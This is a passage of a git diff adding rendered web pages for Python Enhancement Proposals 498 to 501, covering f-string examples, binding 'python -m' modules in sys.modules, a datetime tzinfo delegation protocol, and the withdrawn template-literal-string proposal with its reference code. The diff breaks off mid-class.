The ‘u’ prefix was added to Python 3.3 in PEP 414 as a means to ease +source compatibility with Python 2.7. Because Python 2.7 will never +support f-strings, there is nothing to be gained by being able to +combine the ‘f’ prefix with ‘u’.

+
+
+
+

Examples from Python’s source code

+

Here are some examples from Python source code that currently use +str.format(), and how they would look with f-strings. This PEP +does not recommend wholesale converting to f-strings, these are just +examples of real-world usages of str.format() and how they’d look +if written from scratch using f-strings.

+

Lib/asyncio/locks.py:

+
extra = '{},waiters:{}'.format(extra, len(self._waiters))
+extra = f'{extra},waiters:{len(self._waiters)}'
+
+
+

Lib/configparser.py:

+
message.append(" [line {0:2d}]".format(lineno))
+message.append(f" [line {lineno:2d}]")
+
+
+

Tools/clinic/clinic.py:

+
methoddef_name = "{}_METHODDEF".format(c_basename.upper())
+methoddef_name = f"{c_basename.upper()}_METHODDEF"
+
+
+

python-config.py:

+
print("Usage: {0} [{1}]".format(sys.argv[0], '|'.join('--'+opt for opt in valid_opts)), file=sys.stderr)
+print(f"Usage: {sys.argv[0]} [{'|'.join('--'+opt for opt in valid_opts)}]", file=sys.stderr)
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0498.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0499/index.html b/pep-0499/index.html new file mode 100644 index 00000000000..112f7e936ed --- /dev/null +++ b/pep-0499/index.html @@ -0,0 +1,343 @@ + + + + + + + + PEP 499 – python -m foo should also bind 'foo' in sys.modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 499 – python -m foo should also bind 'foo' in sys.modules

+
+
Author:
+
Cameron Simpson <cs at cskk.id.au>, Chris Angelico <rosuav at gmail.com>, Joseph Jevnik <joejev at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
07-Aug-2015
+
Python-Version:
+
3.10
+
+
+
+
Table of Contents +
+
+

PEP Deferral

+

The implementation of this PEP isn’t currently expected to be ready for the +Python 3.9 feature freeze in April 2020, so it has been deferred 12 months to +Python 3.10.

+
+
+

Abstract

+

When a module is used as a main program on the Python command line, +such as by:

+
+
python -m module.name …
+

it is easy to accidentally end up with two independent instances +of the module if that module is again imported within the program. +This PEP proposes a way to fix this problem.

+

When a module is invoked via Python’s -m option the module is bound +to sys.modules['__main__'] and its .__name__ attribute is set to +'__main__'. +This enables the standard “main program” boilerplate code at the +bottom of many modules, such as:

+
if __name__ == '__main__':
+    sys.exit(main(sys.argv))
+
+
+

However, when the above command line invocation is used it is a +natural inference to presume that the module is actually imported +under its official name module.name, +and therefore that if the program again imports that name +then it will obtain the same module instance.

+

That actuality is that the module was imported only as '__main__'. +Another import will obtain a distinct module instance, which can +lead to confusing bugs, +all stemming from having two instances of module global objects: +one in each module.

+

Examples include:

+
+
module level data structures
Some modules provide features such as caches or registries +as module level global variables, +typically private. +A second instance of a module creates a second data structure. +If that structure is a cache +such as in the re module +then two caches exist leading to wasteful memory use. +If that structure is a shared registry +such as a mapping of values to handlers +then it is possible to register a handler to one registry +and to try to use it via the other registry, where it is unknown.
+
sentinels
The standard test for a sentinel value provided by a module +is the identity comparison using is, +as this avoids unreliable “looks like” comparisons +such as equality which can both mismatch two values as “equal” +(for example being zeroish) +or raise a TypeError when the objects are incompatible. +When there are two instances of a module +there are two sentinel instances +and only one will be recognised via is.
+
classes
With two modules +there are duplicate class definitions of any classes provided. +All operations which depend on recognising these classes +and subclasses of these are prone to failure +depending where the reference class +(from one of the modules) is obtained +and where the comparison class or instance is obtained. +This impacts isinstance, issubclass +and also try/except constructs.
+
+
+
+

Proposal

+

It is suggested that to fix this situation all that is needed is a +simple change to the way the -m option is implemented: in addition +to binding the module object to sys.modules['__main__'], it is also +bound to sys.modules['module.name'].

+

Alyssa (Nick) Coghlan has suggested that this is as simple as modifying the +runpy module’s _run_module_as_main function as follows:

+
main_globals = sys.modules["__main__"].__dict__
+
+
+

to instead be:

+
main_module = sys.modules["__main__"]
+sys.modules[mod_spec.name] = main_module
+main_globals = main_module.__dict__
+
+
+

Joseph Jevnik has pointed out that modules which are packages already +do something very similar to this proposal: +the __init__.py file is bound to the module’s canonical name +and the __main__.py file is bound to “__main__”. +As such, the double import issue does not occur. +Therefore, this PEP proposes to affect only simple non-package modules.

+
+
+

Considerations and Prerequisites

+
+

Pickling Modules

+

Alyssa has mentioned issue 19702 which proposes (quoted from the issue):

+
    +
  • runpy will ensure that when __main__ is executed via the import +system, it will also be aliased in sys.modules as __spec__.name
  • +
  • if __main__.__spec__ is set, pickle will use __spec__.name rather +than __name__ to pickle classes, functions and methods defined in +__main__
  • +
  • multiprocessing is updated appropriately to skip creating __mp_main__ +in child processes when __main__.__spec__ is set in the parent +process
  • +
+

The first point above covers this PEP’s specific proposal.

+
+
+

A Normal Module’s __name__ Is No Longer Canonical

+

Chris Angelico points out that it becomes possible to import a +module whose __name__ is not what you gave to “import”, since +“__main__” is now present at “module.name”, so a subsequent +import module.name finds it already present. +Therefore, __name__ is no longer the canonical name for some normal imports.

+

Some counter arguments follow:

+
    +
  • As of PEP 451 a module’s canonical name is stored at __spec__.name.
  • +
  • Very little code should actually care about __name__ being the canonical name +and any that does should arguably be updated to consult __spec__.name +with fallback to __name__ for older Pythons, should that be relevant. +This is true even if this PEP is not approved.
  • +
  • Should this PEP be approved, +it becomes possible to introspect a module by its canonical name +and ask “was this the main program?” by inferring from __name__. +This was not previously possible.
  • +
+

The glaring counter example is the standard “am I the main program?” boilerplate, +where __name__ is expected to be “__main__”. +This PEP explicitly preserves that semantic.

+
+
+
+

Reference Implementation

+

BPO 36375 is the issue tracker entry +for the PEP’s reference implementation, with the current draft PR being +available on GitHub.

+
+
+

Open Questions

+

This proposal does raise some backwards compatibility concerns, and these will +need to be well understood, and either a deprecation process designed, or clear +porting guidelines provided.

+
+

Pickle compatibility

+

If no changes are made to the pickle module, then pickles that were previously +being written with the correct module name (due to a dual import) may start +being written with __main__ as their module name instead, and hence fail +to be loaded correctly by other projects.

+

Scenarios to be checked:

+
    +
  • python script.py writing, python -m script reading
  • +
  • python -m script writing, python script.py reading
  • +
  • python -m script writing, python some_other_app.py reading
  • +
  • old_python -m script writing, new_python -m script reading
  • +
  • new_python -m script writing, old_python -m script reading
  • +
+
+
+

Projects that special-case __main__

+

In order to get the regression test suite to pass, the current reference +implementation had to patch pdb to avoid destroying its own global +namespace.

+

This suggests there may be a broader compatibility issue where some scripts are +relying on direct execution and import giving different namespaces (just as +package execution keeps the two separate by executing the __main__ +submodule in the __main__ namespace, while the package name references +the __init__ file as usual.

+
+
+
+

Background

+

I tripped over this issue while debugging a main program via a +module which tried to monkey patch a named module, that being the +main program module. Naturally, the monkey patching was ineffective +as it imported the main module by name and thus patched the second +module instance, not the running module instance.

+

However, the problem has been around as long as the -m command +line option and is encountered regularly, if infrequently, by others.

+

In addition to issue 19702, the discrepancy around __main__ +is alluded to in PEP 451 and a similar proposal (predating PEP 451) +is described in PEP 395 under +Fixing dual imports of the main module.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0499.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0500/index.html b/pep-0500/index.html new file mode 100644 index 00000000000..4ba2a2fa9a6 --- /dev/null +++ b/pep-0500/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 500 – A protocol for delegating datetime methods to their tzinfo implementations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 500 – A protocol for delegating datetime methods to their tzinfo implementations

+
+
Author:
+
Alexander Belopolsky <alexander.belopolsky at gmail.com>, Tim Peters <tim.peters at gmail.com>
+
Discussions-To:
+
Datetime-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
495
+
Created:
+
08-Aug-2015
+
Resolution:
+
Datetime-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a new protocol (PDDM - “A Protocol for Delegating +Datetime Methods”) that can be used by concrete implementations of the +datetime.tzinfo interface to override aware datetime arithmetics, +formatting and parsing. We describe changes to the +datetime.datetime class to support the new protocol and propose a +new abstract class datetime.tzstrict that implements parts of this +protocol necessary to make aware datetime instances to follow “strict” +arithmetic rules.

+
+
+

Rationale

+

As of Python 3.5, aware datetime instances that share a tzinfo +object follow the rules of arithmetics that are induced by a simple +bijection between (year, month, day, hour, minute, second, +microsecond) 7-tuples and large integers. In this arithmetics, the +difference between YEAR-11-02T12:00 and YEAR-11-01T12:00 is always 24 +hours, even though in the US/Eastern timezone, for example, there are +25 hours between 2014-11-01T12:00 and 2014-11-02T12:00 because the +local clocks were rolled back one hour at 2014-11-02T02:00, +introducing an extra hour in the night between 2014-11-01 and +2014-11-02.

+

Many business applications require the use of Python’s simplified view +of local dates. No self-respecting car rental company will charge its +customers more for a week that straddles the end of DST than for any +other week or require that they return the car an hour early. +Therefore, changing the current rules for aware datetime arithmetics +will not only create a backward compatibility nightmare, it will +eliminate support for legitimate and common use cases.

+

Since it is impossible to choose universal rules for local time +arithmetics, we propose to delegate implementation of those rules to +the classes that implement datetime.tzinfo interface. With such +delegation in place, users will be able to choose between different +arithmetics by simply picking instances of different classes for the +value of tzinfo.

+
+
+

Protocol

+
+

Subtraction of datetime

+

A tzinfo subclass supporting the PDDM, may define a method called +__datetime_diff__ that should take two datetime.datetime +instances and return a datetime.timedelta instance representing +the time elapsed from the time represented by the first datetime +instance to another.

+
+
+

Addition

+

A tzinfo subclass supporting the PDDM, may define a method called +__datetime_add__ that should take two arguments–a datetime and a +timedelta instances–and return a datetime instance.

+
+
+

Subtraction of timedelta

+

A tzinfo subclass supporting the PDDM, may define a method called +__datetime_sub__ that should take two arguments–a datetime and a +timedelta instances–and return a datetime instance.

+
+
+

Formatting

+

A tzinfo subclass supporting the PDDM, may define methods called +__datetime_isoformat__ and __datetime_strftime__.

+

The __datetime_isoformat__ method should take a datetime instance +and an optional separator and produce a string representation of the +given datetime instance.

+

The __datetime_strftime__ method should take a datetime instance +and a format string and produce a string representation of the given +datetime instance formatted according to the given format.

+
+
+

Parsing

+

A tzinfo subclass supporting the PDDM, may define a class method +called __datetime_strptime__ and register the “canonical” names of +the timezones that it implements with a registry. TODO Describe a +registry.

+
+
+
+

Changes to datetime methods

+
+

Subtraction

+
class datetime:
+    def __sub__(self, other):
+        if isinstance(other, datetime):
+            try:
+                self_diff = self.tzinfo.__datetime_diff__
+            except AttributeError:
+                self_diff = None
+            try:
+                other_diff = self.tzinfo.__datetime_diff__
+            except AttributeError:
+                other_diff = None
+            if self_diff is not None:
+                if self_diff is not other_diff and self_diff.__func__ is not other_diff.__func__:
+                    raise ValueError("Cannot find difference of two datetimes with "
+                                     "different tzinfo.__datetime_diff__ implementations.")
+                return self_diff(self, other)
+        elif isinstance(other, timedelta):
+            try:
+                sub = self.tzinfo.__datetime_sub__
+            except AttributeError:
+                pass
+            else:
+                return sub(self, other)
+            return self + -other
+        else:
+            return NotImplemented
+        # current implementation
+
+
+
+
+

Addition

+

Addition of a timedelta to a datetime instance will be delegated to the +self.tzinfo.__datetime_add__ method whenever it is defined.

+
+
+
+

Strict arithmetics

+

A new abstract subclass of datetime.tzinfo class called datetime.tzstrict +will be added to the datetime module. This subclass will not implement the +utcoffset(), tzname() or dst() methods, but will implement some of the +methods of the PDDM.

+

The PDDM methods implemented by tzstrict will be equivalent to the following:

+
class tzstrict(tzinfo):
+    def __datetime_diff__(self, dt1, dt2):
+        utc_dt1 = dt1.astimezone(timezone.utc)
+        utc_dt2 = dt2.astimezone(timezone.utc)
+        return utc_dt2 - utc_dt1
+
+    def __datetime_add__(self, dt, delta):
+        utc_dt = dt.astimezone(timezone.utc)
+        return (utc_dt + delta).astimezone(self)
+
+    def __datetime_sub__(self, dt, delta):
+        utc_dt = dt.astimezone(timezone.utc)
+        return (utc_dt - delta).astimezone(self)
+
+
+
+

Parsing and formatting

+

Datetime methods strftime and isoformat will delegate to the namesake +methods of their tzinfo members whenever those methods are defined.

+

When the datetime.strptime method is given a format string that +contains a %Z instruction, it will lookup the tzinfo +implementation in the registry by the given timezone name and call its +__datetime_strptime__ method.

+
+
+
+

Applications

+

This PEP will enable third party implementation of many different +timekeeping schemes including:

+
    +
  • Julian / Microsoft Excel calendar.
  • +
  • “Right” timezones with the leap second support.
  • +
  • French revolutionary calendar (with a lot of work).
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0500.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0501/index.html b/pep-0501/index.html new file mode 100644 index 00000000000..41141b84f98 --- /dev/null +++ b/pep-0501/index.html @@ -0,0 +1,1462 @@ + + + + + + + + PEP 501 – General purpose template literal strings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 501 – General purpose template literal strings

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Nick Humrich <nick at humrich.us>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Requires:
+
701
+
Created:
+
08-Aug-2015
+
Python-Version:
+
3.12
+
Post-History:
+
08-Aug-2015, +05-Sep-2015, +09-Mar-2023
+
Superseded-By:
+
750
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been superseded by PEP 750.

+

×

+

+
+
+

Abstract

+

Though easy and elegant to use, Python f-strings +can be vulnerable to injection attacks when used to construct +shell commands, SQL queries, HTML snippets and similar +(for example, os.system(f"echo {message_from_user}")). +This PEP introduces template literal strings (or “t-strings”), +which have syntax and semantics that are similar to f-strings, +but with rendering deferred until format() or another +template rendering function is called on them. +This will allow standard library calls, helper functions +and third party tools to safety and intelligently perform +appropriate escaping and other string processing on inputs +while retaining the usability and convenience of f-strings.

+
+
+

PEP Withdrawal

+

When PEP 750 was first published as a “tagged strings” proposal +(allowing for arbitrary string prefixes), this PEP was kept open to +continue championing the simpler “template literal” approach that +used a single dedicated string prefix to produce instances of a new +“interpolation template” type.

+

The October 2024 updates +to PEP 750 agreed that template strings were a better fit for Python +than the broader tagged strings concept.

+

All of the other concerns the authors of this PEP had with PEP 750 +were also either addressed in those updates, or else left in a state +where they could reasonably be addressed in a future change proposal.

+

Due to the clear improvements in the updated PEP 750 proposal, +this PEP has been withdrawn in favour of PEP 750.

+
+

Important

+

The remainder of this PEP still reflects the state of the tagged strings +proposal in August 2024. It has not been updated to reflect the +October 2024 changes to PEP 750, since the PEP withdrawal makes doing +so redundant.

+
+
+
+

Relationship with other PEPs

+

This PEP is inpired by and builds on top of the f-string syntax first implemented +in PEP 498 and formalised in PEP 701.

+

This PEP complements the literal string typing support added to Python’s formal type +system in PEP 675 by introducing a safe way to do dynamic interpolation of runtime +values into security sensitive strings.

+

This PEP competes with some aspects of the tagged string proposal in PEP 750 +(most notably in whether template rendering is expressed as render(t"template literal") +or as render"template literal"), but also shares many common features (after +PEP 750 was published, this PEP was updated with +several new changes +inspired by the tagged strings proposal).

+

This PEP does NOT propose an alternative to PEP 292 for user interface +internationalization use cases (but does note the potential for future syntactic +enhancements aimed at that use case that would benefit from the compiler-supported +value interpolation machinery that this PEP and PEP 750 introduce).

+
+
+

Motivation

+

PEP 498 added new syntactic support for string interpolation that is +transparent to the compiler, allowing name references from the interpolation +operation full access to containing namespaces (as with any other expression), +rather than being limited to explicit name references. These are referred +to in the PEP (and elsewhere) as “f-strings” (a mnemonic for “formatted strings”).

+

Since acceptance of PEP 498, f-strings have become well-established and very popular. +f-strings became even more useful and flexible with the formalised grammar in PEP 701. +While f-strings are great, eager rendering has its limitations. For example, the +eagerness of f-strings has made code like the following unfortunately plausible:

+
os.system(f"echo {message_from_user}")
+
+
+

This kind of code is superficially elegant, but poses a significant problem +if the interpolated value message_from_user is in fact provided by an +untrusted user: it’s an opening for a form of code injection attack, where +the supplied user data has not been properly escaped before being passed to +the os.system call.

+

While the LiteralString type annotation introduced in PEP 675 means that typecheckers +are able to report a type error for this kind of unsafe function usage, those errors don’t +help make it easier to write code that uses safer alternatives (such as +subprocess.run()).

+

To address that problem (and a number of other concerns), this PEP proposes +the complementary introduction of “t-strings” (a mnemonic for “template literal strings”), +where format(t"Message with {data}") would produce the same result as +f"Message with {data}", but the template literal instance can instead be passed +to other template rendering functions which process the contents of the template +differently.

+
+
+

Proposal

+
+

Dedicated template literal syntax

+

This PEP proposes a new string prefix that declares the +string to be a template literal rather than an ordinary string:

+
template = t"Substitute {names:>{field_width}} and {expressions()!r} at runtime"
+
+
+

This would be effectively interpreted as:

+
template = TemplateLiteral(
+    r"Substitute {names:>{field_width}} and {expressions()} at runtime",
+    TemplateLiteralText(r"Substitute "),
+    TemplateLiteralField("names", names, f">{field_width}", ""),
+    TemplateLiteralText(r" and "),
+    TemplateLiteralField("expressions()", expressions(), f"", "r"),
+)
+
+
+

(Note: this is an illustrative example implementation. The exact compile time construction +syntax of types.TemplateLiteral is considered an implementation detail not specified by +the PEP. In particular, the compiler may bypass the default constructor’s runtime logic that +detects consecutive text segments and merges them into a single text segment, as well as +checking the runtime types of all supplied arguments).

+

The __format__ method on types.TemplateLiteral would then +implement the following str.format() inspired semantics:

+
>>> import datetime
+>>> name = 'Jane'
+>>> age = 50
+>>> anniversary = datetime.date(1991, 10, 12)
+>>> format(t'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.')
+'My name is Jane, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
+>>> format(t'She said her name is {name!r}.')
+"She said her name is 'Jane'."
+
+
+

The syntax of template literals would be based on PEP 701, and largely use the same +syntax for the string portion of the template. Aside from using a different prefix, the one +other syntactic change is in the definition and handling of conversion specifiers, both to +allow !() as a standard conversion specifier to request evaluation of a field at +rendering time, and to allow custom renderers to also define custom conversion specifiers.

+

This PEP does not propose to remove or deprecate any of the existing +string formatting mechanisms, as those will remain valuable when formatting +strings that are not present directly in the source code of the application.

+
+
+

Lazy field evaluation conversion specifier

+

In addition to the existing support for the a, r, and s conversion specifiers, +str.format(), str.format_map(), and string.Formatter will be updated +to accept () as a conversion specifier that means “call the interpolated value”.

+

To support application of the standard conversion specifiers in custom template rendering +functions, a new operator.convert_field() function will be added.

+

The signature and behaviour of the format() builtin will also be updated to accept a +conversion specifier as a third optional parameter. If a non-empty conversion specifier +is given, the value will be converted with operator.convert_field() before looking up +the __format__ method.

+
+
+

Custom conversion specifiers

+

To allow additional field-specific directives to be passed to custom rendering functions in +a way that still allows formatting of the template with the default renderer, the conversion +specifier field will be allowed to contain a second ! character.

+

operator.convert_field() and format() (and hence the default +TemplateLiteral.render template rendering method), will ignore that character and any +subsequent text in the conversion specifier field.

+

str.format(), str.format_map(), and string.Formatter will also be +updated to accept (and ignore) custom conversion specifiers.

+
+
+

Template renderer for POSIX shell commands

+

As both a practical demonstration of the benefits of delayed rendering support, and as +a valuable feature in its own right, a new sh template renderer will be added to +the shlex module. This renderer will produce strings where all interpolated fields +are escaped with shlex.quote().

+

The subprocess.Popen API (and higher level APIs that depend on it, such as +subprocess.run()) will be updated to accept interpolation templates and handle +them in accordance with the new shlex.sh renderer.

+
+
+
+

Background

+

This PEP was initially proposed as a competitor to PEP 498. After it became clear that +the eager rendering proposal had sustantially more immediate support, it then spent several +years in a deferred state, pending further experience with PEP 498’s simpler approach of +only supporting eager rendering without the additional complexity of also supporting deferred +rendering.

+

Since then, f-strings have become very popular and PEP 701 was introduced to tidy up some +rough edges and limitations in their syntax and semantics. The template literal proposal +was updated in 2023 to reflect current knowledge of f-strings, and improvements from +PEP 701.

+

In 2024, PEP 750 was published, proposing a general purpose mechanism for custom tagged +string prefixes, rather than the narrower template literal proposal in this PEP. This PEP +was again updated, both to incorporate new ideas inspired by the tagged strings proposal, +and to describe the perceived benefits of the narrower template literal syntax proposal +in this PEP over the more general tagged string proposal.

+
+

Summary of differences from f-strings

+

The key differences between f-strings and t-strings are:

+
    +
  • the t (template literal) prefix indicates delayed rendering, but +otherwise largely uses the same syntax and semantics as formatted strings
  • +
  • template literals are available at runtime as a new kind of object +(types.TemplateLiteral)
  • +
  • the default rendering used by formatted strings is invoked on a +template literal object by calling format(template) rather than +being done implicitly in the compiled code
  • +
  • unlike f-strings (where conversion specifiers are handled directly in the compiler), +t-string conversion specifiers are handled at rendering time by the rendering function
  • +
  • the new !() conversion specifier indicates that the field expression is a callable +that should be called when using the default format() rendering function. This +specifier is specifically not being added to f-strings (since it is pointless there).
  • +
  • a second ! is allowed in t-string conversion specifiers (with any subsequent text +being ignored) as a way to allow custom template rendering functions to accept custom +conversion specifiers without breaking the default TemplateLiteral.render() +rendering method. This feature is specifically not being added to f-strings (since +it is pointless there).
  • +
  • while f-string f"Message {here}" would be semantically equivalent to +format(t"Message {here}"), f-strings will continue to be supported directly in the +compiler and hence avoid the runtime overhead of actually using the delayed rendering +machinery that is needed for t-strings
  • +
+
+
+

Summary of differences from tagged strings

+

When tagged strings were +first proposed, +there were several notable differences from the proposal in PEP 501 beyond the surface +syntax difference between whether rendering function invocations are written as +render(t"template literal") or as render"template literal".

+

Over the course of the initial PEP 750 discussion, many of those differences were eliminated, +either by PEP 501 adopting that aspect of PEP 750’s proposal (such as lazily applying +conversion specifiers), or by PEP 750 changing to retain some aspect of PEP 501’s proposal +(such as defining a dedicated type to hold template segments rather than representing them +as simple sequences).

+

The main remaining significant difference is that this PEP argues that adding only the +t-string prefix is a sufficient enhancement to give all the desired benefits described in +PEP 750. The expansion to a generalised “tagged string” syntax isn’t necessary, and causes +additional problems that can be avoided.

+

The two PEPs also differ in their proposed approaches to handling lazy evaluation of template +fields.

+

While there are other differences between the two proposals, those differences are more +cosmetic than substantive. In particular:

+
    +
  • this PEP proposes different names for the structural typing protocols
  • +
  • this PEP proposes specific names for the concrete implementation types
  • +
  • this PEP proposes exact details for the proposed APIs of the concrete implementation types +(including concatenation and repetition support, which are not part of the structural +typing protocols)
  • +
  • this PEP proposes changes to the existing format() builtin to make it usable +directly as a template field renderer
  • +
+

The two PEPs also differ in how they make their case for delayed rendering support. This +PEP focuses more on the concrete implementation concept of using template literals to allow +the “interpolation” and “rendering” steps in f-string processing to be separated in time, +and then taking advantage of that to reduce the potential code injection risks associated +with misuse of f-strings. PEP 750 focuses more on the way that native templating support +allows behaviours that are difficult or impossible to achieve via existing string based +templating methods. As with the cosmetic differences noted above, this is more a difference +in style than a difference in substance.

+
+
+
+

Rationale

+

f-strings (PEP 498) made interpolating values into strings with full access to Python’s +lexical namespace semantics simpler, but it does so at the cost of creating a +situation where interpolating values into sensitive targets like SQL queries, +shell commands and HTML templates will enjoy a much cleaner syntax when handled +without regard for code injection attacks than when they are handled correctly.

+

This PEP proposes to provide the option of delaying the actual rendering +of a template literal to a formatted string to its __format__ method, allowing the use +of other template renderers by passing the template around as a first class object.

+

While very different in the technical details, the +types.TemplateLiteral interface proposed in this PEP is +conceptually quite similar to the FormattableString type underlying the +native interpolation +support introduced in C# 6.0, as well as the +JavaScript template literals +introduced in ES6.

+

While not the original motivation for developing the proposal, many of the benefits for +defining domain specific languages described in PEP 750 also apply to this PEP +(including the potential for per-DSL semantic highlighting in code editors based on the +type specifications of declared template variables and rendering function parameters).

+
+
+

Specification

+

This PEP proposes a new t string prefix that +results in the creation of an instance of a new type, +types.TemplateLiteral.

+

Template literals are Unicode strings (bytes literals are not +permitted), and string literal concatenation operates as normal, with the +entire combined literal forming the template literal.

+

The template string is parsed into literals, expressions, format specifiers, and conversion +specifiers as described for f-strings in PEP 498 and PEP 701. The syntax for conversion +specifiers is relaxed such that arbitrary strings are accepted (excluding those containing +{, } or :) rather than being restricted to valid Python identifiers.

+

However, rather than being rendered directly into a formatted string, these +components are instead organised into instances of new types with the +following behaviour:

+
class TemplateLiteralText(str):
+    # This is a renamed and extended version of the DecodedConcrete type in PEP 750
+    # Real type would be implemented in C, this is an API compatible Python equivalent
+    _raw: str
+
+    def __new__(cls, raw: str):
+        decoded = raw.encode("utf-8").decode("unicode-escape")
+        if decoded == raw:
+            decoded = raw
+        text = super().__new__(cls, decoded)
+        text._raw = raw
+        return text
+
+    @staticmethod
+    def merge(text_segments:Sequence[TemplateLiteralText]) -> TemplateLiteralText:
+        if len(text_segments) == 1:
+            return text_segments[0]
+        return TemplateLiteralText("".join(t._raw for t in text_segments))
+
+    @property
+    def raw(self) -> str:
+        return self._raw
+
+    def __repr__(self) -> str:
+        return f"{type(self).__name__}(r{self._raw!r})"
+
+    def __add__(self, other:Any) -> TemplateLiteralText|NotImplemented:
+        if isinstance(other, TemplateLiteralText):
+            return TemplateLiteralText(self._raw + other._raw)
+        return NotImplemented
+
+
+    def __mul__(self, other:Any) -> TemplateLiteralText|NotImplemented:
+        try:
+            factor = operator.index(other)
+        except TypeError:
+            return NotImplemented
+        return TemplateLiteralText(self._raw * factor)
+    __rmul__ = __mul__
+
+class TemplateLiteralField(NamedTuple):
+    # This is mostly a renamed version of the InterpolationConcrete type in PEP 750
+    # However:
+    #    - value is eagerly evaluated (values were all originally lazy in PEP 750)
+    #    - conversion specifiers are allowed to be arbitrary strings
+    #    - order of fields is adjusted so the text form is the first field and the
+    #      remaining parameters match the updated signature of the `*format` builtin
+    # Real type would be implemented in C, this is an API compatible Python equivalent
+
+    expr: str
+    value: Any
+    format_spec: str | None = None
+    conversion_spec: str | None = None
+
+    def __repr__(self) -> str:
+        return (f"{type(self).__name__}({self.expr}, {self.value!r}, "
+                f"{self.format_spec!r}, {self.conversion_spec!r})")
+
+    def __str__(self) -> str:
+        return format(self.value, self.format_spec, self.conversion_spec)
+
+    def __format__(self, format_override) -> str:
+        if format_override:
+            format_spec = format_override
+        else:
+            format_spec = self.format_spec
+        return format(self.value, format_spec, self.conversion_spec)
+
+class TemplateLiteral:
+    # This type corresponds to the TemplateConcrete type in PEP 750
+    # Real type would be implemented in C, this is an API compatible Python equivalent
+    _raw_template: str
+    _segments = tuple[TemplateLiteralText|TemplateLiteralField]
+
+    def __new__(cls, raw_template:str, *segments:TemplateLiteralText|TemplateLiteralField):
+        self = super().__new__(cls)
+        self._raw_template = raw_template
+        # Check if there are any adjacent text segments that need merging
+        # or any empty text segments that need discarding
+        type_err = "Template literal segments must be template literal text or field instances"
+        text_expected = True
+        needs_merge = False
+        for segment in segments:
+            match segment:
+                case TemplateLiteralText():
+                    if not text_expected or not segment:
+                        needs_merge = True
+                        break
+                    text_expected = False
+                case TemplateLiteralField():
+                    text_expected = True
+                case _:
+                    raise TypeError(type_err)
+        if not needs_merge:
+            # Match loop above will have checked all segments
+            self._segments = segments
+            return self
+        # Merge consecutive runs of text fields and drop any empty text fields
+        merged_segments:list[TemplateLiteralText|TemplateLiteralField] = []
+        pending_merge:list[TemplateLiteralText] = []
+        for segment in segments:
+            match segment:
+                case TemplateLiteralText() as text_segment:
+                    if text_segment:
+                        pending_merge.append(text_segment)
+                case TemplateLiteralField():
+                    if pending_merge:
+                        merged_segments.append(TemplateLiteralText.merge(pending_merge))
+                        pending_merge.clear()
+                    merged_segments.append(segment)
+                case _:
+                    # First loop above may not check all segments when a merge is needed
+                    raise TypeError(type_err)
+        if pending_merge:
+            merged_segments.append(TemplateLiteralText.merge(pending_merge))
+            pending_merge.clear()
+        self._segments = tuple(merged_segments)
+        return self
+
+    @property
+    def raw_template(self) -> str:
+        return self._raw_template
+
+    @property
+    def segments(self) -> tuple[TemplateLiteralText|TemplateLiteralField]:
+        return self._segments
+
+    def __len__(self) -> int:
+        return len(self._segments)
+
+    def __iter__(self) -> Iterable[TemplateLiteralText|TemplateLiteralField]:
+        return iter(self._segments)
+
+    # Note: template literals do NOT define any relative ordering
+    def __eq__(self, other):
+        if not isinstance(other, TemplateLiteral):
+            return NotImplemented
+        return (
+            self._raw_template == other._raw_template
+            and self._segments == other._segments
+            and self.field_values == other.field_values
+            and self.format_specifiers == other.format_specifiers
+        )
+
+    def __repr__(self) -> str:
+        return (f"{type(self).__name__}(r{self._raw!r}, "
+                f"{', '.join(map(repr, self._segments))})")
+
+    def __format__(self, format_specifier) -> str:
+        # When formatted, render to a string, and then use string formatting
+        return format(self.render(), format_specifier)
+
+    def render(self, *, render_template=''.join, render_text=str, render_field=format):
+        ...  # See definition of the template rendering semantics below
+
+    def __add__(self, other) -> TemplateLiteral|NotImplemented:
+        if isinstance(other, TemplateLiteral):
+            combined_raw_text = self._raw + other._raw
+            combined_segments = self._segments + other._segments
+            return TemplateLiteral(combined_raw_text, *combined_segments)
+        if isinstance(other, str):
+            # Treat the given string as a new raw text segment
+            combined_raw_text = self._raw + other
+            combined_segments = self._segments + (TemplateLiteralText(other),)
+            return TemplateLiteral(combined_raw_text, *combined_segments)
+        return NotImplemented
+
+    def __radd__(self, other) -> TemplateLiteral|NotImplemented:
+        if isinstance(other, str):
+            # Treat the given string as a new raw text segment. This effectively
+            # has precedence over string concatenation in CPython due to
+            # https://github.com/python/cpython/issues/55686
+            combined_raw_text = other + self._raw
+            combined_segments = (TemplateLiteralText(other),) + self._segments
+            return TemplateLiteral(combined_raw_text, *combined_segments)
+        return NotImplemented
+
+    def __mul__(self, other) -> TemplateLiteral|NotImplemented:
